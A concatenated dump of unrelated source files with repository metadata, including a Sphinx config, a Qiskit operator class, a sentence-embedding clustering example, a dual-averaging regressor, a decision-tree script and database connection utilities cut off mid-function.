] | null | null | null | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../'))
# -- Project information -----------------------------------------------------
project = 'Bunruija'
copyright = '2021, Takuya Makino'
author = 'Takuya Makino'
# The full version, including alpha/beta/rc tags
release = '0.0.0'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
| 34.206897 | 79 | 0.664315 |
4a1f4e883ee98be13f0c2970723e5a35ca16742a | 377 | py | Python | run-fetch-boxscores.py | slinden2/player-follower | 7db8ffbd4af3c8cfb394492689d448e0e697c19d | [
"MIT"
] | null | null | null | run-fetch-boxscores.py | slinden2/player-follower | 7db8ffbd4af3c8cfb394492689d448e0e697c19d | [
"MIT"
] | 17 | 2020-02-10T11:27:00.000Z | 2022-02-26T11:52:12.000Z | run-fetch-boxscores.py | slinden2/player-follower | 7db8ffbd4af3c8cfb394492689d448e0e697c19d | [
"MIT"
] | null | null | null | import os
import datetime
# move to correct path
FILE_PATH = os.path.join(os.path.dirname(
os.path.realpath(__file__)), "backend")
os.chdir(FILE_PATH)
# day before first fetch date
date = datetime.datetime(2019, 3, 10)
for i in range(0, 20):
    date += datetime.timedelta(days=1)
    dateStr = date.strftime('%Y-%m-%d')
    os.system(f'npm run fetch_boxscores {dateStr}')
| 23.5625 | 48 | 0.69496 |
4a1f4e9f6e8adbb2ec3ca57f186e3f78893d0b11 | 966 | py | Python | project_manager_pro/exec.py | FullDungeon/project_manager | cc3906c13b3d83eb2e78f6b8b197d0aed1f2a414 | [
"MIT"
] | null | null | null | project_manager_pro/exec.py | FullDungeon/project_manager | cc3906c13b3d83eb2e78f6b8b197d0aed1f2a414 | [
"MIT"
] | null | null | null | project_manager_pro/exec.py | FullDungeon/project_manager | cc3906c13b3d83eb2e78f6b8b197d0aed1f2a414 | [
"MIT"
] | null | null | null | import json
import os
from colorama import init, Style, Fore
from project_manager_pro._meta import cache_commands, cache_projects
init(autoreset=True)
def _exec(alias, name):
# loading command
file = open(cache_commands, 'r', encoding='utf-8')
commands = json.load(file)
if alias in commands:
command = commands[alias]
else:
print(Fore.RED + 'Command with alias \'' + alias + '\' not found')
return
# loading project
file = open(cache_projects, 'r', encoding='utf-8')
data = json.load(file)
for type in data:
for project in data[type]:
if project['name'] == str(name) or str(project['hash']) == str(name):
command = command.replace('$', project['path'])
print(Fore.GREEN + 'run ' + Fore.CYAN + command)
os.system(command)
return
print(Fore.RED + 'Project with name (hash) \'' + str(name) + '\' not found')
| 25.421053 | 81 | 0.594203 |
4a1f4f0832cac8cf9964fff3f967b7d2b3ca3c02 | 9,629 | py | Python | qiskit/opflow/state_fns/operator_state_fn.py | ajavadia/qiskit-sdk-py | a59e8e6be1793197e19998c1f7dcfc45e6f2f3af | [
"Apache-2.0"
] | 11 | 2019-06-27T09:53:29.000Z | 2021-03-02T04:40:30.000Z | qiskit/opflow/state_fns/operator_state_fn.py | ajavadia/qiskit-sdk-py | a59e8e6be1793197e19998c1f7dcfc45e6f2f3af | [
"Apache-2.0"
] | 12 | 2018-09-21T12:02:18.000Z | 2018-09-25T09:14:59.000Z | qiskit/opflow/state_fns/operator_state_fn.py | ajavadia/qiskit-sdk-py | a59e8e6be1793197e19998c1f7dcfc45e6f2f3af | [
"Apache-2.0"
] | 4 | 2019-08-05T15:35:33.000Z | 2020-09-18T18:55:02.000Z | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" OperatorStateFn Class """
from typing import Union, Set, List
import numpy as np
from qiskit.circuit import ParameterExpression
from ..operator_base import OperatorBase
from .state_fn import StateFn
from .vector_state_fn import VectorStateFn
from ..list_ops.list_op import ListOp
from ..list_ops.summed_op import SummedOp
# pylint: disable=invalid-name
class OperatorStateFn(StateFn):
r"""
A class for state functions and measurements which are defined by a density Operator,
stored using an ``OperatorBase``.
"""
# TODO allow normalization somehow?
def __init__(self,
primitive: OperatorBase = None,
coeff: Union[int, float, complex, ParameterExpression] = 1.0,
is_measurement: bool = False) -> None:
"""
Args:
primitive: The ``OperatorBase`` which defines the behavior of the underlying State
function.
coeff: A coefficient by which to multiply the state function
is_measurement: Whether the StateFn is a measurement operator
"""
super().__init__(primitive, coeff=coeff, is_measurement=is_measurement)
def primitive_strings(self) -> Set[str]:
return self.primitive.primitive_strings()
@property
def num_qubits(self) -> int:
return self.primitive.num_qubits
def add(self, other: OperatorBase) -> OperatorBase:
if not self.num_qubits == other.num_qubits:
raise ValueError(
'Sum over statefns with different numbers of qubits, {} and {}, is not well '
'defined'.format(self.num_qubits, other.num_qubits))
# Right now doesn't make sense to add a StateFn to a Measurement
if isinstance(other, OperatorStateFn) and self.is_measurement == other.is_measurement:
if isinstance(self.primitive.primitive, type(other.primitive.primitive)) and \
self.primitive == other.primitive:
return StateFn(self.primitive,
coeff=self.coeff + other.coeff,
is_measurement=self.is_measurement)
# Covers Statevector and custom.
elif isinstance(other, OperatorStateFn):
# Also assumes scalar multiplication is available
return OperatorStateFn(
(self.coeff * self.primitive).add(other.primitive * other.coeff),
is_measurement=self._is_measurement)
return SummedOp([self, other])
def adjoint(self) -> OperatorBase:
return OperatorStateFn(self.primitive.adjoint(),
coeff=self.coeff.conjugate(),
is_measurement=(not self.is_measurement))
def _expand_dim(self, num_qubits: int) -> 'OperatorStateFn':
return OperatorStateFn(self.primitive._expand_dim(num_qubits),
coeff=self.coeff,
is_measurement=self.is_measurement)
def permute(self, permutation: List[int]) -> 'OperatorStateFn':
return OperatorStateFn(self.primitive.permute(permutation),
coeff=self.coeff,
is_measurement=self.is_measurement)
def tensor(self, other: OperatorBase) -> OperatorBase:
if isinstance(other, OperatorStateFn):
return StateFn(self.primitive.tensor(other.primitive),
coeff=self.coeff * other.coeff,
is_measurement=self.is_measurement)
# pylint: disable=cyclic-import,import-outside-toplevel
from .. import TensoredOp
return TensoredOp([self, other])
def to_density_matrix(self, massive: bool = False) -> np.ndarray:
""" Return numpy matrix of density operator, warn if more than 16 qubits
to force the user to set
massive=True if they want such a large matrix. Generally big methods like
this should require the use of a
converter, but in this case a convenience method for quick hacking and
access to classical tools is
appropriate. """
OperatorBase._check_massive('to_density_matrix', True, self.num_qubits, massive)
return self.primitive.to_matrix() * self.coeff
def to_matrix_op(self, massive: bool = False) -> OperatorBase:
""" Return a MatrixOp for this operator. """
return OperatorStateFn(self.primitive.to_matrix_op(massive=massive) * self.coeff,
is_measurement=self.is_measurement)
def to_matrix(self, massive: bool = False) -> np.ndarray:
r"""
Note: this does not return a density matrix, it returns a classical matrix
containing the quantum or classical vector representing the evaluation of the state
        function on each binary basis state. Do not assume this is a normalized quantum or
classical probability vector. If we allowed this to return a density matrix,
then we would need to change the definition of composition to be ~Op @ StateFn @ Op for
those cases, whereas by this methodology we can ensure that composition always means Op
@ StateFn.
Return numpy vector of state vector, warn if more than 16 qubits to force the user to set
massive=True if they want such a large vector.
Args:
massive: Whether to allow large conversions, e.g. creating a matrix representing
over 16 qubits.
Returns:
np.ndarray: Vector of state vector
Raises:
ValueError: Invalid parameters.
"""
OperatorBase._check_massive('to_matrix', False, self.num_qubits, massive)
# Operator - return diagonal (real values, not complex),
# not rank 1 decomposition (statevector)!
mat = self.primitive.to_matrix(massive=massive)
# TODO change to weighted sum of eigenvectors' StateFns?
# ListOp primitives can return lists of matrices (or trees for nested ListOps),
# so we need to recurse over the
# possible tree.
def diag_over_tree(t):
if isinstance(t, list):
return [diag_over_tree(o) for o in t]
else:
vec = np.diag(t) * self.coeff
# Reshape for measurements so np.dot still works for composition.
return vec if not self.is_measurement else vec.reshape(1, -1)
return diag_over_tree(mat)
def to_circuit_op(self) -> OperatorBase:
r""" Return ``StateFnCircuit`` corresponding to this StateFn. Ignore for now because this is
undefined. TODO maybe call to_pauli_op and diagonalize here, but that could be very
inefficient, e.g. splitting one Stabilizer measurement into hundreds of 1 qubit Paulis."""
raise NotImplementedError
def __str__(self) -> str:
prim_str = str(self.primitive)
if self.coeff == 1.0:
return "{}({})".format('OperatorStateFn' if not self.is_measurement
else 'OperatorMeasurement', prim_str)
else:
return "{}({}) * {}".format(
'OperatorStateFn' if not self.is_measurement else 'OperatorMeasurement',
prim_str,
self.coeff)
# pylint: disable=too-many-return-statements
def eval(self,
front: Union[str, dict, np.ndarray,
OperatorBase] = None) -> Union[OperatorBase, float, complex]:
if front is None:
matrix = self.primitive.to_matrix_op().primitive.data
return VectorStateFn(matrix[0, :])
if not self.is_measurement and isinstance(front, OperatorBase):
raise ValueError(
'Cannot compute overlap with StateFn or Operator if not Measurement. Try taking '
'sf.adjoint() first to convert to measurement.')
if not isinstance(front, OperatorBase):
front = StateFn(front)
if isinstance(self.primitive, ListOp) and self.primitive.distributive:
coeff = self.coeff * self.primitive.coeff
evals = [OperatorStateFn(op, coeff=coeff, is_measurement=self.is_measurement).eval(
front) for op in self.primitive.oplist]
return self.primitive.combo_fn(evals)
# Need an ListOp-specific carve-out here to make sure measurement over a ListOp doesn't
# produce two-dimensional ListOp from composing from both sides of primitive.
# Can't use isinstance because this would include subclasses.
# pylint: disable=unidiomatic-typecheck
if type(front) == ListOp:
return front.combo_fn([self.eval(front.coeff * front_elem) # type: ignore
for front_elem in front.oplist]) # type: ignore
return front.adjoint().eval(self.primitive.eval(front)) * self.coeff # type: ignore
def sample(self,
shots: int = 1024,
massive: bool = False,
reverse_endianness: bool = False) -> dict:
raise NotImplementedError
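# Illustrative usage sketch (not part of the class; assumes the ``Z`` operator
# and ``Zero`` state globals exported by ``qiskit.opflow``). Evaluating the
# Pauli Z operator as a measurement against |0> gives <0|Z|0> = 1:
#
#     from qiskit.opflow import Z, Zero
#     measurement = OperatorStateFn(Z, is_measurement=True)
#     print(measurement.eval(Zero))  # approximately (1+0j)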
| 44.786047 | 100 | 0.636515 |
4a1f4f2367cd8ef1e8f90d7e2d48211cc5da3fa8 | 5,711 | py | Python | examples/applications/clustering/fast_clustering.py | sourcery-ai-bot/sentence-transformers | 9541056f0d37677f3b978a1267260d6586ce89cc | [
"Apache-2.0"
] | null | null | null | examples/applications/clustering/fast_clustering.py | sourcery-ai-bot/sentence-transformers | 9541056f0d37677f3b978a1267260d6586ce89cc | [
"Apache-2.0"
] | null | null | null | examples/applications/clustering/fast_clustering.py | sourcery-ai-bot/sentence-transformers | 9541056f0d37677f3b978a1267260d6586ce89cc | [
"Apache-2.0"
] | null | null | null | """
This is a more complex example of performing clustering on a large-scale dataset.
This example finds local communities in a large set of sentences, i.e., groups of sentences that are highly
similar. You can freely configure the threshold for what is considered similar. A high threshold will
only find extremely similar sentences; a lower threshold will find more sentences that are less similar.
A second parameter is 'min_community_size': only communities with at least a certain number of sentences will be returned.
The method for finding the communities is extremely fast; clustering 50k sentences requires only about 5 seconds (plus embedding computation).
In this example, we download a large set of questions from Quora and then find
similar questions in this set.
"""
from sentence_transformers import SentenceTransformer, util
import numpy as np
import os
import csv
import pickle
import time
def community_detection(embeddings, threshold=0.75, min_community_size=10, init_max_size=1000):
"""
Function for Fast Community Detection
Finds in the embeddings all communities, i.e. embeddings that are close (closer than threshold).
Returns only communities that are larger than min_community_size. The communities are returned
in decreasing order. The first element in each list is the central point in the community.
"""
# Compute cosine similarity scores
cos_scores = util.pytorch_cos_sim(embeddings, embeddings)
# Minimum size for a community
top_k_values, _ = cos_scores.topk(k=min_community_size, largest=True)
# Filter for rows >= min_threshold
extracted_communities = []
for i in range(len(top_k_values)):
if top_k_values[i][-1] >= threshold:
new_cluster = []
# Only check top k most similar entries
top_val_large, top_idx_large = cos_scores[i].topk(k=init_max_size, largest=True)
top_idx_large = top_idx_large.tolist()
top_val_large = top_val_large.tolist()
if top_val_large[-1] < threshold:
for idx, val in zip(top_idx_large, top_val_large):
if val < threshold:
break
new_cluster.append(idx)
else:
# Iterate over all entries (slow)
for idx, val in enumerate(cos_scores[i].tolist()):
if val >= threshold:
new_cluster.append(idx)
extracted_communities.append(new_cluster)
# Largest cluster first
extracted_communities = sorted(extracted_communities, key=lambda x: len(x), reverse=True)
# Step 2) Remove overlapping communities
unique_communities = []
extracted_ids = set()
for community in extracted_communities:
add_cluster = all(idx not in extracted_ids for idx in community)
if add_cluster:
unique_communities.append(community)
for idx in community:
extracted_ids.add(idx)
return unique_communities
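# Illustrative sketch of the return format (not executed here): given an
# (n_sentences x dim) tensor of embeddings, the function returns index lists,
# largest community first, with the central sentence as the first index:
#
#     clusters = community_detection(corpus_embeddings, threshold=0.9, min_community_size=3)
#     # e.g. clusters -> [[17, 4, 52, ...], [8, 33, ...], ...]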
# Model for computing sentence embeddings. We use one trained for similar questions detection
model = SentenceTransformer('distilbert-base-nli-stsb-quora-ranking')
# We download the Quora Duplicate Questions Dataset (https://www.quora.com/q/quoradata/First-Quora-Dataset-Release-Question-Pairs)
# and find similar questions in it
url = "http://qim.fs.quoracdn.net/quora_duplicate_questions.tsv"
dataset_path = "quora_duplicate_questions.tsv"
max_corpus_size = 50000 # We limit our corpus to only the first 50k questions
embedding_cache_path = 'quora-embeddings-size-{}.pkl'.format(max_corpus_size)
#Check if embedding cache path exists
if not os.path.exists(embedding_cache_path):
# Check if the dataset exists. If not, download and extract
# Download dataset if needed
if not os.path.exists(dataset_path):
print("Download dataset")
util.http_get(url, dataset_path)
# Get all unique sentences from the file
corpus_sentences = set()
with open(dataset_path, encoding='utf8') as fIn:
reader = csv.DictReader(fIn, delimiter='\t', quoting=csv.QUOTE_MINIMAL)
for row in reader:
corpus_sentences.add(row['question1'])
if len(corpus_sentences) >= max_corpus_size:
break
corpus_sentences.add(row['question2'])
if len(corpus_sentences) >= max_corpus_size:
break
corpus_sentences = list(corpus_sentences)
print("Encode the corpus. This might take a while")
corpus_embeddings = model.encode(corpus_sentences, show_progress_bar=True, convert_to_numpy=True)
print("Store file on disc")
with open(embedding_cache_path, "wb") as fOut:
pickle.dump({'sentences': corpus_sentences, 'embeddings': corpus_embeddings}, fOut)
else:
print("Load pre-computed embeddings from disc")
with open(embedding_cache_path, "rb") as fIn:
cache_data = pickle.load(fIn)
corpus_sentences = cache_data['sentences']
corpus_embeddings = cache_data['embeddings']
print("Start clustering")
start_time = time.time()
#Two parameter to tune:
#min_cluster_size: Only consider cluster that have at least 25 elements (30 similar sentences)
#threshold: Consider sentence pairs with a cosine-similarity larger than threshold as similar
clusters = community_detection(corpus_embeddings, min_community_size=25, threshold=0.95)
#Print all cluster / communities
for i, cluster in enumerate(clusters):
print("\nCluster {}, #{} Elements ".format(i+1, len(cluster)))
for sentence_id in cluster:
print("\t", corpus_sentences[sentence_id])
print("Clustering done after {:.2f} sec".format(time.time() - start_time)) | 39.937063 | 143 | 0.709158 |
4a1f4f3d91982d2ea80d4f5e58037fd0d77bdd1f | 2,571 | py | Python | calculateRanking.py | ConorMaley/Catan | c16f1a1d1eb286b13322a8b50ef319dd079ef01c | [
"Apache-2.0"
] | null | null | null | calculateRanking.py | ConorMaley/Catan | c16f1a1d1eb286b13322a8b50ef319dd079ef01c | [
"Apache-2.0"
] | null | null | null | calculateRanking.py | ConorMaley/Catan | c16f1a1d1eb286b13322a8b50ef319dd079ef01c | [
"Apache-2.0"
] | null | null | null | import googleSheetsApi
import eloCalculator
def main():
masterSheet = googleSheetsApi.getMasterSheet()
Elos = {}
playersArray = []
highestELO = {}
highestELO['score'] = 1200
lowestELO = {}
lowestELO['score'] = 1200
for line_count, row in enumerate(masterSheet):
if line_count == 0:
for name in row[1:]:
Elos[name] = 1200
playersArray.append(name)
# print(f'Column names are {", ".join(row)}')
else:
Gamescore = {}
OldElos = {}
for index, score in enumerate(row[1:]):
if score == '':
score = 0
if int(score) >= 2:
Gamescore[playersArray[index]] = score
OldElos[playersArray[index]] = Elos[playersArray[index]]
for index, (player, score) in enumerate(Gamescore.items()):
scoreChange = 0
for jindex, (opp, oppScore) in enumerate(Gamescore.items()):
if index != jindex:
if int(score) > int(oppScore):
status = 1
elif int(score) == int(oppScore):
status = 0.5
else:
status = 0
# print(f'{status} = status')
# K is constant for now
tempSC = eloCalculator.CalcEloChange(Elos[player], OldElos[opp], 30, status)
# print(f'{player} {Elos[player]} scored {score}, Opponent {opp} {OldElos[opp]} scored {oppScore}, change to player {tempSC}')
scoreChange += tempSC
# print(f'{player} scoreChange = {scoreChange}')
Elos[player] += round(scoreChange, 2)
# print(f'=============ELO after {line_count} games=============')
for name in sorted(Elos, key=Elos.get, reverse=True):
# not very efficient
if Elos[name] > highestELO['score']:
highestELO['score'] = Elos[name]
highestELO['player'] = name
highestELO['game'] = line_count
elif Elos[name] < lowestELO['score']:
lowestELO['score'] = Elos[name]
lowestELO['player'] = name
lowestELO['game'] = line_count
# print(f'{name}: {Elos[name]}')
# print(f'{sorted( ((name, score) for score, name in Elos.items()), reverse=True)}')
# newScore = '{} : {}'.format(name, score) for score, name in Elos.items() }
# print(f'{newScore}')
# print(f'Game {line_count} {repr(Elos.items())}')
#todo: write to rankings in google sheet
# for avg, val in enumerate(Elos):
# avg += Elos[val]
# print(f'{val}: {Elos[val]}')
# avg = avg/len(Elos)
# print(f'Avg Elo: {avg}')
# Final rankings
print('=============Final ELO count=============')
print(f'Highest ELO: {highestELO}')
print(f'Lowest ELO: {lowestELO}')
for name in sorted(Elos, key=Elos.get, reverse=True):
print(f'{name}: {Elos[name]}')
if __name__ == '__main__':
main() | 30.975904 | 132 | 0.614936 |
4a1f50ad03f7a6627765530eb74786a9747d78f0 | 3,564 | py | Python | ndsys/optimizers/da.py | slagosz/ndsys | 9ef9e47a20fdf93fe2ea3f6c3647e373152e8d9f | [
"MIT"
] | null | null | null | ndsys/optimizers/da.py | slagosz/ndsys | 9ef9e47a20fdf93fe2ea3f6c3647e373152e8d9f | [
"MIT"
] | null | null | null | ndsys/optimizers/da.py | slagosz/ndsys | 9ef9e47a20fdf93fe2ea3f6c3647e373152e8d9f | [
"MIT"
] | null | null | null | import numpy as np
from sklearn.base import BaseEstimator
from sklearn.utils.validation import check_X_y, check_array, check_is_fitted
class EntropicDualAveraging(BaseEstimator):
"""The variant of the Dual Averaging algorithm based on the negative entropy function
Parameters
----------
l1_constraint : float, default=1.0
Radius of an l1-norm ball.
G : float, default=None
This parameter scales the algorithm's step sizes. If set to None, then it is estimated according to
the following formula: G = (l1_constraint + max(y)) ** 2 (see the documentation).
learning_rate : {'constant', 'online', 'adaptive'}, default='adaptive'
The strategy for choosing the algorithm's step sizes.
"""
def __init__(self, l1_constraint=1.0, G=None, learning_rate='adaptive'):
self.l1_constraint = l1_constraint
self.G = G
self.learning_rate = learning_rate
def _validate_params(self):
assert self.l1_constraint > 0
def _estimate_G(self, y):
return self.l1_constraint * (self.l1_constraint + np.max(y))
@staticmethod
def _map_parameters(parameters, R):
D = int(len(parameters) / 2)
transformed_parameters = np.zeros(D)
for i in range(D):
transformed_parameters[i] = R * (parameters[i] - parameters[i + D])
return transformed_parameters
@staticmethod
def _compute_gradient(x, y, y_hat):
return (y_hat - y) * x
def fit(self, X, y):
"""Fits the model.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
The training input samples.
y : array-like, shape (n_samples,) or (n_samples, n_outputs)
The target values.
Returns
-------
self : object
"""
self._validate_params()
X, y = check_X_y(X, y)
n_samples, self.n_features_in_ = X.shape
D = 2 * self.n_features_in_
if self.G is None:
self.G = self._estimate_G(y)
params_0 = np.ones(D) / D
params_avg = params_0
params = params_0
stepsize = None
gradient_sum = 0
gradient_max_sq_sum = 0
if self.learning_rate == 'constant':
stepsize = self.G * self.l1_constraint / np.sqrt(n_samples)
for i in range(n_samples):
x = np.concatenate([X[i], -X[i]]) * self.l1_constraint
y_hat = np.dot(params, x)
gradient = self._compute_gradient(x, y[i], y_hat)
gradient_sum += gradient
if self.learning_rate == 'online':
stepsize = self.G * self.l1_constraint / np.sqrt(i + 1)
elif self.learning_rate == 'adaptive':
gradient_max_sq_sum += np.max(np.abs(gradient)) ** 2
stepsize = np.sqrt(np.log(D) / gradient_max_sq_sum)
params = np.exp(-stepsize * gradient_sum)
params /= np.linalg.norm(params, 1)
params_avg = (params + params_avg * (i + 1)) / (i + 2)
self.params_ = self._map_parameters(params, self.l1_constraint)
return self
def predict(self, X):
"""Predicts the target value.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
            The input samples.
Returns
-------
y : ndarray, shape (n_samples,)
"""
X = check_array(X)
check_is_fitted(self)
return X @ self.params_
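if __name__ == "__main__":
    # Minimal usage sketch (illustrative only): recover a sparse parameter
    # vector inside the l1 ball from noiseless synthetic data.
    rng = np.random.default_rng(0)
    X_demo = rng.uniform(-1.0, 1.0, size=(500, 10))
    w_true = np.zeros(10)
    w_true[:2] = [0.5, -0.3]
    y_demo = X_demo @ w_true
    estimator = EntropicDualAveraging(l1_constraint=1.0, learning_rate='adaptive')
    estimator.fit(X_demo, y_demo)
    print("estimated parameters:", np.round(estimator.params_, 3))
    print("train MSE:", np.mean((estimator.predict(X_demo) - y_demo) ** 2))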
| 29.94958 | 107 | 0.588664 |
4a1f50f11d854ae4eb1a83473396cddecc4f589c | 315 | py | Python | exercises/templatetags/form_widgets.py | rattletat/homework-server | abfac831ed45cc567a6a1610edee934200ffada7 | [
"Unlicense"
] | 1 | 2020-06-03T14:54:38.000Z | 2020-06-03T14:54:38.000Z | exercises/templatetags/form_widgets.py | rattletat/homework-server | abfac831ed45cc567a6a1610edee934200ffada7 | [
"Unlicense"
] | null | null | null | exercises/templatetags/form_widgets.py | rattletat/homework-server | abfac831ed45cc567a6a1610edee934200ffada7 | [
"Unlicense"
] | null | null | null | from django.template import Library
register = Library()
@register.filter
def add_classes(widget, classes):
widget.field.widget.attrs['class'] = classes
return widget
@register.filter
def add_placeholder(widget, placeholder):
widget.field.widget.attrs['placeholder'] = placeholder
return widget
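# Illustrative template usage (assumes ``{% load form_widgets %}`` at the top
# of the template; field and class names below are examples only):
#
#     {{ form.email|add_classes:"form-control" }}
#     {{ form.email|add_placeholder:"you@example.com" }}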
| 21 | 58 | 0.755556 |
4a1f52b30392ebc6491e741567ded1b4be3db371 | 2,529 | py | Python | decision_tree.py | jkleve/Presidential-Prediction | 5a9f7b0d5e954eb7c7f59a3a7f9081257c7f0268 | [
"MIT"
] | null | null | null | decision_tree.py | jkleve/Presidential-Prediction | 5a9f7b0d5e954eb7c7f59a3a7f9081257c7f0268 | [
"MIT"
] | null | null | null | decision_tree.py | jkleve/Presidential-Prediction | 5a9f7b0d5e954eb7c7f59a3a7f9081257c7f0268 | [
"MIT"
] | null | null | null | from sklearn.naive_bayes import GaussianNB
from sklearn import tree
import numpy as np
import matplotlib.pyplot as plt
import sys
def read_data(file_name, n_features, n_samples):
n = n_features
m = n_samples
y = np.zeros(shape=(m,1))
arr = np.zeros(shape=(m,n))
i = 0
with open(file_name) as f:
for l in f:
data = [int(d.rstrip()) for d in l.split(',')]
arr[i] = data[0:n]
y[i] = data[n]
i += 1
return arr, y
def get_train_set(arr, i):
beginning = arr[0:i]
end = arr[i+1:]
if len(beginning) > 0:
if len(end) > 0:
return (np.concatenate((beginning,end)))
else:
return beginning
else:
return end
def gen_2d_feature_set(f1, f2):
return np.column_stack((f1,f2))
def run_test(x, y, num_samples, num_features):
num_correct = 0
for i in range(0,num_samples):
testx = x[i]
testy = y[i]
trainx = get_train_set(x, i)
trainy = get_train_set(y, i)
X = trainx.reshape(-1,num_features)
Y = trainy.reshape(1,-1)[0]
clf_tree = tree.DecisionTreeClassifier()
clf_tree.fit(X,Y)
guess = clf_tree.predict([testx])
#clf = GaussianNB()
#clf.fit(X,Y)
#print(clf.get_params())
#guess = clf.predict([testx])
if testy == guess: num_correct += 1
#print("Testing with %d: NB guess %d, actual %d" % (i+1, guess[0], testy))
    return (num_correct / float(num_samples))  # fraction of leave-one-out tests predicted correctly
def print_results(d):
import operator
output = sorted(d.items(), key=operator.itemgetter(1), reverse=True)
print(output)
if __name__ == "__main__":
    num_features = 1
    num_samples = 50
    features, y = read_data('data.txt', num_features, num_samples)
    print(y)
    sys.exit()
    #num_samples = features.shape[0]
    tests = {}
    # go through each feature pair (i, j)
    for i in range(0, num_features):
        # inner loop over the second feature of the pair
        for j in range(i, num_features):
            x = None
            test_name = ""
            num_f = 0
            # if i == j lets just test that one feature
            if i == j:
                x = features[:,i]
                num_f = 1
                test_name = "%d" % (i+1)
            else:
                x = gen_2d_feature_set(features[:,i], features[:,j])
                num_f = 2
                test_name = "%d,%d" % (i+1,j+1)
            accuracy = run_test(x, y, num_samples, num_f)
            tests[test_name] = accuracy
            #print("%d,%d: %f" % (i,j,accuracy))
    print_results(tests)
    sys.exit()
    #plt.plot(x5,y,'ro')
    #plt.show()
    #sys.exit()
| 25.039604 | 82 | 0.552392 |
4a1f5304f5072466944a11d8ea6e7bc783fb29a8 | 5,289 | py | Python | dbutils.py | workforce-data-initiative/etp-warehouse | 5713a9a196d48954023bc97cb79c929e637810e8 | [
"Apache-2.0"
] | null | null | null | dbutils.py | workforce-data-initiative/etp-warehouse | 5713a9a196d48954023bc97cb79c929e637810e8 | [
"Apache-2.0"
] | null | null | null | dbutils.py | workforce-data-initiative/etp-warehouse | 5713a9a196d48954023bc97cb79c929e637810e8 | [
"Apache-2.0"
] | null | null | null | import logging
import yaml
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, Session
logger = logging.getLogger(__name__)
class DbConfValidator(object):
@staticmethod
def validate_conf(db_conf):
pass
class DbConnectionUri(object):
@classmethod
def build_conn_uri(cls, db_conf):
pass
class SqliteDbConfValidator(DbConfValidator):
@staticmethod
def validate_conf(db_conf):
"""
Validate SQLite database connection parameters
:param db_conf: dict of connection parameters
        :return: dict of validated connection parameters
"""
logger.info("Validating database connection configs")
if db_conf is None:
raise ValueError("Database connection configs required")
return db_conf
class PsqlDbConfValidator(DbConfValidator):
@staticmethod
def validate_conf(db_conf):
"""
Validate PostgreSQL database connection parameters
:param db_conf: dict of connection parameters
        :return: dict of validated connection parameters
"""
logger.info("Validating database connection configs")
if db_conf is None:
raise ValueError("Database connection configs required")
return db_conf
class SqliteDbConnectionUri(DbConnectionUri):
db_adapter = "sqlite"
conn_uri = "{db_adapter}:///{db_path}"
@classmethod
def build_conn_uri(cls, db_conf):
"""
Create database connection uri for SQLite
:param db_conf: dict of connection parameters
:return: valid connection string for database built
from parameters passed in db_conf
"""
db_conf = SqliteDbConfValidator.validate_conf(db_conf)
return cls.conn_uri.format(db_adapter=cls.db_adapter, db_path=db_conf['database'])
class PsqlDbConnectionUri(DbConnectionUri):
db_adapter = "postgresql"
conn_uri = "{db_adapter}://{username}:{password}@{host}:{port}/{database}"
@classmethod
def build_conn_uri(cls, db_conf):
"""
Create database connection uri for PostgreSQL
:param db_conf: dict of connection parameters
:return: valid connection string for database built
from parameters passed in db_conf
"""
db_conf = PsqlDbConfValidator.validate_conf(db_conf)
return cls.conn_uri.format(db_adapter=cls.db_adapter, username=db_conf['username'],
password=db_conf['password'], host=db_conf['host'],
port=db_conf['port'], database=db_conf['database'])
class DbConnection(object):
Session = sessionmaker()
def __init__(self, conn_uri):
self.engine = create_engine(conn_uri)
def start_session(self):
"""
Start database connection session
:return: new session object bound to instance engine created from
connection string passed on DbConnection object creation
"""
logger.info("Starting database connection session")
self.Session.configure(bind=self.engine)
        return self.Session()
# selector for supported database connections
db_uris = {'sqlite': SqliteDbConnectionUri().__class__,
'postgresql': PsqlDbConnectionUri().__class__}
def read_dbconf(conf_file, db_adapter, schema_name):
"""
Read (yaml format) database configuration file
:param conf_file: YAML file containing database connection params
:param db_adapter: Database adapter name
:param schema_name: 'schema' used loosely here to indicate which
database is being accessed, [transactional | warehouse]
:raises: TypeError, when conf_file or db_adapter passed is None
FileNotFoundError if conf_file is not found or yaml.YAMLError
if conf_file yaml is not read
:return: dict of database conf for the specified db_adapter
"""
try:
with open(conf_file, 'r') as yml_conf:
            conf = yaml.safe_load(yml_conf)
except(TypeError, FileNotFoundError, yaml.YAMLError) as err:
logger.debug(err)
raise
return conf.get(db_adapter).get(schema_name)
def conn_uri_factory(conf_file, db_adapter, schema_name):
"""
Create the applicable connection uri for the database adapter
passed using parameters read from config file
:param conf_file: YAML file containing database connection params
used by SQLAlchemy to create connection. Supported
fields include SQLAlchemy database adapter name, host
port, username, password, database
:param db_adapter: Database adapter name as accepted by SQLAlchemy
:param schema_name: 'schema' used loosely here to indicate which
database is being accessed, [transactional | warehouse]
:return: SQLAlchemy connection uri for the database with specified adapter
"""
try:
db_conf = read_dbconf(conf_file, db_adapter, schema_name)
